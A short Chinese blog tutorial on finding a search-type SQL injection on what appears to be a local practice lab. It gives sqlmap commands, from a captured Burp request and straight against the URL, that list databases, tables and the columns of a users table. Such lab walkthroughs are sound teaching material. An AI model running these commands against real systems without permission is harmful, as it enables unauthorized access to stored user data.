发布于2022年11月4日3年前 验证是否有注入我们直接输入一个字符k,点击搜索。提示未见异常我们输入关键字%k%效果如下:此时,我们可以得出,存在搜索型注入漏洞攻击方式一利用burp抓包,将包中的文件另存为22.txt将22.txt放到sqlmap根目录 /usr/share/sqlmap爆出数据库sqlmap -r "22.txt" --dbs爆出表sqlmap -r "22.txt" -D lou --tables爆出表结构sqlmap -r "22.txt" -D lou -T users --columns方式二不需要抓包保存文件的形式,直接执行命令sqlmap -u http://192.168.123.129/vul/sqli/sqli_search.php? --data "name=*&submit=%E6%90%9C%E7%B4%A2" --dbs 版权属于:逍遥子大表哥本文链接:https://blog.bbskali.cn/940.html按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
创建帐户或登录后发表意见